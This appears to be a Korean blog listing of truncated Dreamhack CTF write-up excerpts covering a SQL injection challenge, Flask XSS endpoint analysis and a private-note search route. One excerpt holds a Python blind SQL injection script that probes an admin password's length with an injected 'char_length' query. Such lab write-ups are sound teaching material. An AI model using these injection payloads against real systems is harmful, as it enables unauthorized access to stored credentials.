KWAKBUMJUN

문제 분석문제 링크를 통해 접속해보면 위와 같이 uid에 파라미터로 test를 입력하면 화면에 test가 뜨는 것을 확인할 수 있다. DB 분석CREATE DATABASE IF NOT EXISTS `users`;GRANT ALL PRIVILEGES ON users.* TO 'dbuser'@'localhost' IDENTIFIED BY 'dbpass';USE `users`;CREATE TABLE user( idx int auto_increment primary key, uid varchar(128) not null, upw varchar(128) not null);INSERT INTO user(uid, upw) values('admin', 'DH{**FLAG**}');INSERT INTO user(u..

익스플로잇 코드# admin 비밀번호의 길이를 알아내야 함# 비밀번호에는 한글과 아스키코드가 섞여있음# --> 그냥 length 함수 쓰면 오류가 날 수 있기 때문에 char_length 함수 사용해야함import requestshost = "http://host3.dreamhack.games:8475/"pw_len = 0def password_length(): global pw_len while True: pw_len += 1 query = f"admin' and char_length(upw) = {pw_len}-- -" r = requests.get(f"{host}?uid={query}") if "exists" in r.text: ..

엔드 포인트 분석/vuln@app.route("/vuln")def vuln(): param = request.args.get("param", "") return render_template("vuln.html", nonce=nonce, param=param)해당 함수에서는 파라미터를 사용자에게 받고 받은 값을 param에 넘겨준다. 그리고 vuln.html을 반환한다. 여기서 vuln.html을 반환할때 render_template함수를 사용하고 있기 때문에 XSS는 어려울것으로 예상된다. vuln.html{% extends "base.html" %}{% block title %}Index{% endblock %}{% block head %} {{ super() }} {% endblock ..

엔드 포인트 분석notes = { (FLAG, True), ("Hello World", False), ("DreamHack", False), ("carpe diem, quam minimum credula postero", False)}/search@app.route('/search')def search(): query = request.args.get('query', None) if query == None: return render_template("search.html", query=None, result=None) for note, private in notes: if private == True and request.remote_..